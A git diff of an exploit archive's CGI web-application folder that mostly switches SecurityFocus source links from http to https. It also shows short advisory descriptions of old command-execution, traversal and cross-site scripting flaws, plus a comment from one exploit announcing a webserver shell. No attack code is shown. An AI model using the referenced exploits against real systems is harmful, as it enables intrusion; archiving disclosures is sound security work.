@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6711/info +source: https://www.securityfocus.com/bid/6711/info MultiHTML is prone to a file disclosure vulnerability. diff --git a/exploits/cgi/webapps/22227.txt b/exploits/cgi/webapps/22227.txt index d3bbb0197..a7068f4f7 100644 --- a/exploits/cgi/webapps/22227.txt +++ b/exploits/cgi/webapps/22227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6783/info +source: https://www.securityfocus.com/bid/6783/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server. diff --git a/exploits/cgi/webapps/22228.txt b/exploits/cgi/webapps/22228.txt index c85d279b0..846ef97bf 100644 --- a/exploits/cgi/webapps/22228.txt +++ b/exploits/cgi/webapps/22228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6784/info +source: https://www.securityfocus.com/bid/6784/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server. diff --git a/exploits/cgi/webapps/22260.c b/exploits/cgi/webapps/22260.c index 739b6ba36..c5cd352a1 100644 --- a/exploits/cgi/webapps/22260.c +++ b/exploits/cgi/webapps/22260.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +// source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22261.pl b/exploits/cgi/webapps/22261.pl index bc5288e0b..bfebbb779 100755 --- a/exploits/cgi/webapps/22261.pl +++ b/exploits/cgi/webapps/22261.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22262.pl b/exploits/cgi/webapps/22262.pl index cc55bb434..4684c9f1a 100755 --- a/exploits/cgi/webapps/22262.pl +++ b/exploits/cgi/webapps/22262.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22263.pl b/exploits/cgi/webapps/22263.pl index 4cfb3ae89..b20533dd0 100755 --- a/exploits/cgi/webapps/22263.pl +++ b/exploits/cgi/webapps/22263.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6882/info +source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script. diff --git a/exploits/cgi/webapps/22337.txt b/exploits/cgi/webapps/22337.txt index 3e1689b0d..b004e9c5c 100644 --- a/exploits/cgi/webapps/22337.txt +++ b/exploits/cgi/webapps/22337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7043/info +source: https://www.securityfocus.com/bid/7043/info A remote command execution vulnerability has been discovered in the Wordit Logbook application. This issue occurs due to insufficient sanitization of externally supplied data to the 'logbook.pl' script. diff --git a/exploits/cgi/webapps/22364.c b/exploits/cgi/webapps/22364.c index 89e54f791..83420eae2 100644 --- a/exploits/cgi/webapps/22364.c 
+++ b/exploits/cgi/webapps/22364.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7115/info +// source: https://www.securityfocus.com/bid/7115/info Outblaze web mail service has been reported prone to an authentication cookie spoofing vulnerability. diff --git a/exploits/cgi/webapps/22377.txt b/exploits/cgi/webapps/22377.txt index a1c487a27..ad2faac72 100644 --- a/exploits/cgi/webapps/22377.txt +++ b/exploits/cgi/webapps/22377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7125/info +source: https://www.securityfocus.com/bid/7125/info Kebi Academy 2001 does not sufficiently validate input supplied via URI parameters. As a result it has been reported that it is possible to retrieve arbitrary files which are readable by the web server. It has also been reported that it is possible to upload malicious files to the server. This could result in disclosure of sensitive information or execution of arbitrary commands in the context of the web server. diff --git a/exploits/cgi/webapps/22380.pl b/exploits/cgi/webapps/22380.pl index ed59c0989..7c432702e 100755 --- a/exploits/cgi/webapps/22380.pl +++ b/exploits/cgi/webapps/22380.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7133/info +source: https://www.securityfocus.com/bid/7133/info A vulnerability has been discovered in the Smart Search CGI script. Due to insufficient sanitization of user-supplied URI parameters, it may be possible for an attacker to execute arbitrary commands on a target system. All commands executed in this manner would be run with the privileges of the web server hosting the script. diff --git a/exploits/cgi/webapps/22408.txt b/exploits/cgi/webapps/22408.txt index 84c454259..bdbf2d48c 100644 --- a/exploits/cgi/webapps/22408.txt +++ b/exploits/cgi/webapps/22408.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7167/info +source: https://www.securityfocus.com/bid/7167/info A vulnerability has been reported in Planetmoon Guestbook. It has been reported that remote users may be able to retrieve clear text password lists. Access to this data may allow an attacker to carry out further attacks against a target user. diff --git a/exploits/cgi/webapps/22481.txt b/exploits/cgi/webapps/22481.txt index bbd4f0356..d7e2c8b73 100644 --- a/exploits/cgi/webapps/22481.txt +++ b/exploits/cgi/webapps/22481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7319/info +source: https://www.securityfocus.com/bid/7319/info Super Guestbook has been reported prone to a sensitive information disclosure weakness. diff --git a/exploits/cgi/webapps/22482.txt b/exploits/cgi/webapps/22482.txt index 6f846973b..f739d2145 100644 --- a/exploits/cgi/webapps/22482.txt +++ b/exploits/cgi/webapps/22482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7320/info +source: https://www.securityfocus.com/bid/7320/info Guestbook has been reported prone to a sensitive information disclosure weakness. diff --git a/exploits/cgi/webapps/22499.pl b/exploits/cgi/webapps/22499.pl index 0ee523f8d..5273a764f 100755 --- a/exploits/cgi/webapps/22499.pl +++ b/exploits/cgi/webapps/22499.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7361/info +source: https://www.securityfocus.com/bid/7361/info It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data. diff --git a/exploits/cgi/webapps/22500.pl b/exploits/cgi/webapps/22500.pl index 9d72265b7..71e806cf3 100755 --- a/exploits/cgi/webapps/22500.pl +++ b/exploits/cgi/webapps/22500.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7361/info +source: https://www.securityfocus.com/bid/7361/info It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data. diff --git a/exploits/cgi/webapps/22545.pl b/exploits/cgi/webapps/22545.pl index 5af6313a3..62ccbac6c 100755 --- a/exploits/cgi/webapps/22545.pl +++ b/exploits/cgi/webapps/22545.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7444/info +source: https://www.securityfocus.com/bid/7444/info A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used. diff --git a/exploits/cgi/webapps/22559.pl b/exploits/cgi/webapps/22559.pl index d615a62c5..b963dfb3b 100755 --- a/exploits/cgi/webapps/22559.pl +++ b/exploits/cgi/webapps/22559.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7485/info +source: https://www.securityfocus.com/bid/7485/info Stockman Shopping Cart has been reported prone to a remote command execution vulnerability. This issue presents itself in the 'shop.plx' script. @@ -11,7 +11,7 @@ The precise technical details of this vulnerability are currently unknown. This ##################################################### # Stockman Shopping Cart exploit # Spawn bash style Shell with webserver uid -# http://www.securityfocus.com/bid/7485 +# https://www.securityfocus.com/bid/7485 # Spabam 2003 PRIV8 code # #hackarena irc.brasnet.org # This Script is currently under development diff --git a/exploits/cgi/webapps/22571.pl b/exploits/cgi/webapps/22571.pl index b9a66fd6c..2ce8344e9 100755 --- a/exploits/cgi/webapps/22571.pl +++ b/exploits/cgi/webapps/22571.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7529/info +source: https://www.securityfocus.com/bid/7529/info It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the normal_html.cgi script. This could lead to attacks against system resources. diff --git a/exploits/cgi/webapps/22572.pl b/exploits/cgi/webapps/22572.pl index 7dfc542a6..8f05b45a3 100755 --- a/exploits/cgi/webapps/22572.pl +++ b/exploits/cgi/webapps/22572.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7530/info +source: https://www.securityfocus.com/bid/7530/info It has been reported that a problem in the HappyMall E-Commerce software package could allow an attacker to pass arbitrary commands through the member_html.cgi script. This could lead to attacks against system resources. diff --git a/exploits/cgi/webapps/22588.txt b/exploits/cgi/webapps/22588.txt index 78df20918..3874eadca 100644 --- a/exploits/cgi/webapps/22588.txt +++ b/exploits/cgi/webapps/22588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7557/info +source: https://www.securityfocus.com/bid/7557/info IT has been reported that Happymall E-Commerce is prone to cross-site scripting attacks. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to execute arbitrary script code within the browser of a legitimate user visiting the site. diff --git a/exploits/cgi/webapps/22592.txt b/exploits/cgi/webapps/22592.txt index c2d69b7e3..4c2f2c160 100644 --- a/exploits/cgi/webapps/22592.txt +++ b/exploits/cgi/webapps/22592.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7559/info +source: https://www.securityfocus.com/bid/7559/info IT has been reported that Happymall E-Commerce is prone to a file disclosure vulnerability. The problem occurs due to insufficient sanitization of user-supplied URI parameters. As a result, it may be possible for an attacker to view the contents of sensitive system files. Files viewed in this manner would be accessed with the privileges of the Happymall process. diff --git a/exploits/cgi/webapps/22669.txt b/exploits/cgi/webapps/22669.txt index 378059e06..ce8027ba9 100644 --- a/exploits/cgi/webapps/22669.txt +++ b/exploits/cgi/webapps/22669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7729/info +source: https://www.securityfocus.com/bid/7729/info It has been reported that a cross-site scripting vulnerability exists in Bandmin. Because of this, an attacker may be able to execute script code or HTML in the context of the site hosting Bandmin by enticing a web user to follow a malicious link. diff --git a/exploits/cgi/webapps/22688.txt b/exploits/cgi/webapps/22688.txt index 703e56ef2..7d7433417 100644 --- a/exploits/cgi/webapps/22688.txt +++ b/exploits/cgi/webapps/22688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7747/info +source: https://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL. diff --git a/exploits/cgi/webapps/22689.txt b/exploits/cgi/webapps/22689.txt index f2d85737e..757dfb7f9 100644 --- a/exploits/cgi/webapps/22689.txt +++ b/exploits/cgi/webapps/22689.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7747/info +source: https://www.securityfocus.com/bid/7747/info A remote file include vulnerability has been reported for P-Synch. Due to insufficient sanitization of some user-supplied URI variables, it is possible for a remote attacker to include a malicious file in a URL. diff --git a/exploits/cgi/webapps/22692.txt b/exploits/cgi/webapps/22692.txt index f1284bdbd..5fb1cdc0b 100644 --- a/exploits/cgi/webapps/22692.txt +++ b/exploits/cgi/webapps/22692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7751/info +source: https://www.securityfocus.com/bid/7751/info The Zeus Web Server contains a web based administration interface that is vulnerable to cross site scripting attacks. diff --git a/exploits/cgi/webapps/22743.txt b/exploits/cgi/webapps/22743.txt index 55ea0166e..746e0981e 100644 --- a/exploits/cgi/webapps/22743.txt +++ b/exploits/cgi/webapps/22743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7828/info +source: https://www.securityfocus.com/bid/7828/info ImageFolio 'admin.cgi' has been reported prone to a directory traversal vulnerability. diff --git a/exploits/cgi/webapps/22770.txt b/exploits/cgi/webapps/22770.txt index 1fcfb6c36..809357e5d 100644 --- a/exploits/cgi/webapps/22770.txt +++ b/exploits/cgi/webapps/22770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7910/info +source: https://www.securityfocus.com/bid/7910/info Infinity CGI Exploit Scanner is reported to be prone to a cross-site scripting vulnerability. An attacker could exploit this issue to creating a malicious link to a site hosting the software that contains hostile HTML and script code. If this link is visited by a web user, the attacker-supplied code could be interpreted in their browser. diff --git a/exploits/cgi/webapps/22772.txt b/exploits/cgi/webapps/22772.txt index 37b9feb18..572b9bf09 100644 --- a/exploits/cgi/webapps/22772.txt +++ b/exploits/cgi/webapps/22772.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7913/info +source: https://www.securityfocus.com/bid/7913/info Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process. diff --git a/exploits/cgi/webapps/22777.txt b/exploits/cgi/webapps/22777.txt index c475857d0..dd5e758fe 100644 --- a/exploits/cgi/webapps/22777.txt +++ b/exploits/cgi/webapps/22777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7920/info +source: https://www.securityfocus.com/bid/7920/info It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. diff --git a/exploits/cgi/webapps/22799.txt b/exploits/cgi/webapps/22799.txt index fbc0c94c8..fb9801037 100644 --- a/exploits/cgi/webapps/22799.txt +++ b/exploits/cgi/webapps/22799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7966/info +source: https://www.securityfocus.com/bid/7966/info Reportedly, Kerio Mailserver is vulnerable to a cross site-scripting attack. The vulnerability is present in the add_acl module of the Kerio Mailserver web mail component. diff --git a/exploits/cgi/webapps/22804.txt b/exploits/cgi/webapps/22804.txt index d90685d13..625825495 100644 --- a/exploits/cgi/webapps/22804.txt +++ b/exploits/cgi/webapps/22804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7968/info +source: https://www.securityfocus.com/bid/7968/info Reportedly, Kerio Mailserver is vulnerable to a cross site-scripting attack. The vulnerability is present in the do_map module of the Kerio Mailserver web mail component. diff --git a/exploits/cgi/webapps/22843.txt b/exploits/cgi/webapps/22843.txt index 41ee031e6..474e00eb2 100644 --- a/exploits/cgi/webapps/22843.txt 
+++ b/exploits/cgi/webapps/22843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8065/info +source: https://www.securityfocus.com/bid/8065/info MegaBook is prone to multiple HTML injection vulnerabilities. This is due to insufficient sanitization of HTML and script code from user-supplied input, including input supplied to the administrative login page and via the client HTTP User-Agent: header field. Exploitation of these issues could permit hostile HTML or script code to be injected into the guestbook system and rendered in the browser of a legitimate guestbook user. diff --git a/exploits/cgi/webapps/22963.txt b/exploits/cgi/webapps/22963.txt index bb75f55da..0e2b62219 100644 --- a/exploits/cgi/webapps/22963.txt +++ b/exploits/cgi/webapps/22963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8294/info +source: https://www.securityfocus.com/bid/8294/info Softshoe is allegedly prone to cross-site scripting attacks. An attacker can exploit this issue by creating a malicious link that contains hostile HTML or script code to a site that is hosting the vulnerable software. If such a link is visited, the attacker-supplied code may be rendered in the user's web browser. diff --git a/exploits/cgi/webapps/23021.txt b/exploits/cgi/webapps/23021.txt index 3970b33f6..c013d3180 100644 --- a/exploits/cgi/webapps/23021.txt +++ b/exploits/cgi/webapps/23021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8403/info +source: https://www.securityfocus.com/bid/8403/info It has been reported that a cross-site scripting issue exists in the search utility of the software. It is possible that an attacker may create a malicious link containing script code that could be executed in a user's browser. diff --git a/exploits/cgi/webapps/23025.txt b/exploits/cgi/webapps/23025.txt index 766862117..685056efe 100644 --- a/exploits/cgi/webapps/23025.txt +++ b/exploits/cgi/webapps/23025.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8407/info +source: https://www.securityfocus.com/bid/8407/info SurgeLDAP is prone to cross-site scripting attacks. Remote attackers may exploit this issue by enticing a user to visiting a malicious link that includes hostile HTML and script code. This code may be rendered in the user's browser when the link is visited. diff --git a/exploits/cgi/webapps/23059.txt b/exploits/cgi/webapps/23059.txt index 49cd8b753..c30c79cbe 100644 --- a/exploits/cgi/webapps/23059.txt +++ b/exploits/cgi/webapps/23059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8490/info +source: https://www.securityfocus.com/bid/8490/info A vulnerability has been reported in Netbula Anyboard that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker. diff --git a/exploits/cgi/webapps/23085.html b/exploits/cgi/webapps/23085.html index 5f380a21a..d0139357f 100644 --- a/exploits/cgi/webapps/23085.html +++ b/exploits/cgi/webapps/23085.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8521/info +source: https://www.securityfocus.com/bid/8521/info Sitebuilder is said to be prone to a directory traversal vulnerability, potentially allowing users to disclose the contents of system files. The problem occurs due to the application failing to parse user-supplied input for directory traversal sequences (../) supplied to the 'sitebuilder.cgi' script, thus making it possible to access files outside of the established web root. diff --git a/exploits/cgi/webapps/23127.txt b/exploits/cgi/webapps/23127.txt index e88629c09..e3f459cdd 100644 --- a/exploits/cgi/webapps/23127.txt +++ b/exploits/cgi/webapps/23127.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8573/info +source: https://www.securityfocus.com/bid/8573/info A cross-site scripting vulnerability has been reported for Escapade. The vulnerability exists due to insufficient sanitization of some user-supplied values. diff --git a/exploits/cgi/webapps/23128.txt b/exploits/cgi/webapps/23128.txt index 70d7f8f6e..bcfa214d7 100644 --- a/exploits/cgi/webapps/23128.txt +++ b/exploits/cgi/webapps/23128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8574/info +source: https://www.securityfocus.com/bid/8574/info Escapade is prone to a path disclosure vulnerability. It is possible to gain access to sensitive path information by issuing a request for an invalid resource, passed as a value for the PAGE parameter to the Escapade Scripting Engine. diff --git a/exploits/cgi/webapps/23153.txt b/exploits/cgi/webapps/23153.txt index 4d9b93447..a172bdc2b 100644 --- a/exploits/cgi/webapps/23153.txt +++ b/exploits/cgi/webapps/23153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8637/info +source: https://www.securityfocus.com/bid/8637/info A cross-site scripting problem has been reported in NetWin DBabble. This could make it possible for an attacker to potentially execute code in the security context of a site using the vulnerable software. This could be exploited by enticing a user to follow a malicious link to a site hosting the software. diff --git a/exploits/cgi/webapps/23214.txt b/exploits/cgi/webapps/23214.txt index c1b3d7ced..557b915e2 100644 --- a/exploits/cgi/webapps/23214.txt +++ b/exploits/cgi/webapps/23214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8757/info +source: https://www.securityfocus.com/bid/8757/info A problem with message.cgi script used by Cobalt RaQ appliances could lead to cross-site scripting. This could result in attacks attempting to steal authentication information. 
diff --git a/exploits/cgi/webapps/23217.txt b/exploits/cgi/webapps/23217.txt index 84b40c368..3573c0fee 100644 --- a/exploits/cgi/webapps/23217.txt +++ b/exploits/cgi/webapps/23217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8763/info +source: https://www.securityfocus.com/bid/8763/info It has been reported that Divine Content Server is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the 'pagename' attribute in the error page of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/cgi/webapps/23266.txt b/exploits/cgi/webapps/23266.txt index 9fc22e60f..26c16d738 100644 --- a/exploits/cgi/webapps/23266.txt +++ b/exploits/cgi/webapps/23266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8860/info +source: https://www.securityfocus.com/bid/8860/info Dansie Shopping Cart is reported to be prone to path disclosre issue in the 'db' parameter of 'cart.pl' that may lead to an attacker gaining sensitive information about the installation path of the system. diff --git a/exploits/cgi/webapps/23275.txt b/exploits/cgi/webapps/23275.txt index b0a0ed817..791177ce9 100644 --- a/exploits/cgi/webapps/23275.txt +++ b/exploits/cgi/webapps/23275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8876/info +source: https://www.securityfocus.com/bid/8876/info A problem has been reported in the handling of some types of input to DansGuardian. This problem may permit an attacker to launch cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23332.txt b/exploits/cgi/webapps/23332.txt index 77d2e1887..deafd8898 100644 --- a/exploits/cgi/webapps/23332.txt +++ b/exploits/cgi/webapps/23332.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8958/info +source: https://www.securityfocus.com/bid/8958/info MPM Guestbook is reported to be prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of HTML from URI parameters, which will be displayed in web pages that are dynamically generated by the software. diff --git a/exploits/cgi/webapps/23367.txt b/exploits/cgi/webapps/23367.txt index 4490ef099..989949841 100644 --- a/exploits/cgi/webapps/23367.txt +++ b/exploits/cgi/webapps/23367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9000/info +source: https://www.securityfocus.com/bid/9000/info It has been reported that DailyDose may be prone to a remote command execution vulnerability due to insufficient sanitization of $temp variable in dose.pl script. An attacker may submit arbitrary commands that will be executed in the context of the web server hosting the vulnerable script. diff --git a/exploits/cgi/webapps/23370.txt b/exploits/cgi/webapps/23370.txt index 8e30ea81c..2f9795b6f 100644 --- a/exploits/cgi/webapps/23370.txt +++ b/exploits/cgi/webapps/23370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9004/info +source: https://www.securityfocus.com/bid/9004/info nCUBE Server Manager has been reported prone to a directory traversal vulnerability. The issue presents itself likely due to a lack of sufficient sanitization performed on URI parameters. A remote attacker may exploit this condition by supplying directory traversal sequences as a value for the affected URI parameter passed to a Server Manager script. Ultimately this may allow the attacker to break out of the webserver root and view arbitrary directory listings and potentially arbitrary files on the vulnerable system. diff --git a/exploits/cgi/webapps/23395.txt b/exploits/cgi/webapps/23395.txt index 8a6f9ab35..528a50aa8 100644 --- a/exploits/cgi/webapps/23395.txt +++ b/exploits/cgi/webapps/23395.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9094/info +source: https://www.securityfocus.com/bid/9094/info It has been reported that CommerceSQL may be prone to a directory traversal vulnerability that may allow an attacker to gain access to sensitive information. The issue presents itself due to insufficient sanitization of user-supplied input. An attacker may traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/cgi/webapps/23409.c b/exploits/cgi/webapps/23409.c index 93fd350b2..8343c5304 100644 --- a/exploits/cgi/webapps/23409.c +++ b/exploits/cgi/webapps/23409.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9139/info +// source: https://www.securityfocus.com/bid/9139/info A vulnerability has been reported in Jason Maloney's Guestbook that could result in remote command execution with the privileges of the web server. The problem occurs due to the application failing to sanitize sensitive script variables after handling POST requests. This could potentially result in the execution of arbitrary system executables. diff --git a/exploits/cgi/webapps/23410.txt b/exploits/cgi/webapps/23410.txt index 0dc7d6a5b..f309a40c5 100644 --- a/exploits/cgi/webapps/23410.txt +++ b/exploits/cgi/webapps/23410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9140/info +source: https://www.securityfocus.com/bid/9140/info IBM Directory Server is prone to cross-site scripting attacks via the web administrative interface. An attacker may be able to embed hostile HTML and script code in a malicious link to the server, which when followed will be rendered in the victim user's browser. This could allow the attacker to steal cookie-based authentication credentials or to launch other attacks. diff --git a/exploits/cgi/webapps/23418.pl b/exploits/cgi/webapps/23418.pl index 1aeb90fd4..566bd3744 100755 --- a/exploits/cgi/webapps/23418.pl +++ b/exploits/cgi/webapps/23418.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9169/info +source: https://www.securityfocus.com/bid/9169/info It has been reported that WebEye is prone to an information disclosure vulnerability that may allow an attacker to harvest sensitive information from the server such as usernames and passwords. The problem exists in the '/admin/wg_user-info.ml' script that fails to verify user credentials before returning sensitive information. diff --git a/exploits/cgi/webapps/23421.txt b/exploits/cgi/webapps/23421.txt index 2e56102fc..02ccdf24d 100644 --- a/exploits/cgi/webapps/23421.txt +++ b/exploits/cgi/webapps/23421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9180/info +source: https://www.securityfocus.com/bid/9180/info It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes. diff --git a/exploits/cgi/webapps/23432.txt b/exploits/cgi/webapps/23432.txt index c4b1e77f5..51935845a 100644 --- a/exploits/cgi/webapps/23432.txt +++ b/exploits/cgi/webapps/23432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9202/info +source: https://www.securityfocus.com/bid/9202/info RemotelyAnywhere has been reported prone to a logout message injection weakness. It has been reported that this issue presents itself due to a lack of sufficient restrictions performed by RemotelyAnywhere on user supplied 'reason' URI parameters. If a target user followed a malicious link, an attacker could potentially abuse this weakness, to include arbitrary messages in logout screens. This may aid in social engineering type attacks against the target user. diff --git a/exploits/cgi/webapps/23447.txt b/exploits/cgi/webapps/23447.txt index 61c7a498c..90839b957 100644 --- a/exploits/cgi/webapps/23447.txt 
+++ b/exploits/cgi/webapps/23447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9253/info +source: https://www.securityfocus.com/bid/9253/info It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver. diff --git a/exploits/cgi/webapps/23466.txt b/exploits/cgi/webapps/23466.txt index 3c6cfef02..5e5ac245b 100644 --- a/exploits/cgi/webapps/23466.txt +++ b/exploits/cgi/webapps/23466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9282/info +source: https://www.securityfocus.com/bid/9282/info It has been reported that QuikStore Shopping Cart may be prone to an information disclosure vulnerability due to insufficient sanitization of user-supplied data through the 'store' parameter of the 'quikstore.cgi' script. An attacker may dislcose the installation path of a file by making a malformed request and passing a single quote "'" character to generate an error message. The error message is reported to contain sensitive information such as the installation path. diff --git a/exploits/cgi/webapps/23467.txt b/exploits/cgi/webapps/23467.txt index 89fd6e33e..1939e2f77 100644 --- a/exploits/cgi/webapps/23467.txt +++ b/exploits/cgi/webapps/23467.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9283/info +source: https://www.securityfocus.com/bid/9283/info It has been reported that QuikStore Shopping Cart may be prone to a directory traversal vulnerability that may allow an attacker to traverse outside the server root directory by using '../' character sequences. The issue exists due to insufficient sanitization of user-supplied data through the 'template' parameter of the 'quikstore.cgi' script. This issue may also allow an attacker to carry out remote command execution by executing the vulnerable script and including malicious shell metacharacters and commands as a value for the 'template' parameter. diff --git a/exploits/cgi/webapps/23485.txt b/exploits/cgi/webapps/23485.txt index 3d89b1f8d..fd82e612e 100644 --- a/exploits/cgi/webapps/23485.txt +++ b/exploits/cgi/webapps/23485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9307/info +source: https://www.securityfocus.com/bid/9307/info Multiple cross-site scripting vulnerabilities have been reported in L-Soft Listserv. An attacker may exploit these issues by embedding hostile HTML and script code in a link to a site hosting the software. This could permit theft of cookie-based authentication credentials or other attacks. These issues could also provide an attack vector for latent vulnerabilities in web browser software. diff --git a/exploits/cgi/webapps/23488.txt b/exploits/cgi/webapps/23488.txt index 85f8c0c8f..94c089b67 100644 --- a/exploits/cgi/webapps/23488.txt +++ b/exploits/cgi/webapps/23488.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9311/info +source: https://www.securityfocus.com/bid/9311/info It has been reported that BulletScript MailList may be prone to an information disclosure vulnerability that may allow remote attackers to gain access to sensitive information. The issue is reported to be present in the 'action' parameter of bsml.pl script. Information gathered via these attacks may aid an attacker in mounting further attacks against a vulnerable system and the affected users. diff --git a/exploits/cgi/webapps/23535.txt b/exploits/cgi/webapps/23535.txt index 12d33bbd9..376973ce1 100644 --- a/exploits/cgi/webapps/23535.txt +++ b/exploits/cgi/webapps/23535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9394/info +source: https://www.securityfocus.com/bid/9394/info A problem has been identified in the handling of input by scripts packaged with the DansGuardian Webmin Module. Because of this, it is possible for a remote to gain access to potentially sensitive information. diff --git a/exploits/cgi/webapps/23548.txt b/exploits/cgi/webapps/23548.txt index 2baa5c7d7..58ccacfe5 100644 --- a/exploits/cgi/webapps/23548.txt +++ b/exploits/cgi/webapps/23548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9439/info +source: https://www.securityfocus.com/bid/9439/info A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, 